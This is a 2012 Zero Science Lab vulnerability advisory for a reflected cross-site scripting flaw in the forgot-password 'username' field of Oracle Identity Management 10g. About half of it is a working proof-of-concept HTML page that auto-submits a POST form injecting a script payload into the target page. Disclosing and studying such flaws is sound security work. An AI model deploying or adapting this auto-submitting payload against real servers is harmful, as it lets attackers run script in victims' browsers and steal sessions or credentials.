<!--

Oracle Identity Management 10g (username) XSS POST Injection Vulnerability


Vendor: Oracle Corporation
Product web page: https://www.oracle.com
Affected version: 10g (10.1.4.0.1)

Summary: Oracle Identity Management enables organizations to effectively
manage the end-to-end lifecycle of user identities across all enterprise
resources, both within and beyond the firewall and into the cloud. The
Oracle Identity Management platform delivers scalable solutions for identity
governance, access management and directory services. This modern platform
helps organizations strengthen security, simplify compliance and capture
business opportunities around mobile and social access.

Desc: Oracle Identity Management suffers from a reflected XSS POST Injection
vulnerability when parsing user input to the 'username' parameter via POST
method thru '/usermanagement/forgotpassword/index.jsp' script. Attackers can
exploit this weakness to execute arbitrary HTML and script code in a user's
browser session.

Tested on: Oracle Application Server 10g httpd 10.1.2.2.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2012-5110
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5110.php


25.09.2012

-->


<html>
<head>
<title>Oracle Identity Management 10g (username) XSS POST Injection Vulnerability</title>
</head>
<body>
<form
   name="XSS"
   method="POST"
   action="https://192.168.248.132/usermanagement/forgotpassword/index.jsp">
<input
   type="hidden"
   name="btnSubmit"
   value="SUBMIT" />
<input
   type="hidden"
   name="username"
   value='"><script>alert(1);</script>' />
</form>
<script
   type="text/javascript">
   document.XSS.submit();
</script>
</body>
</html>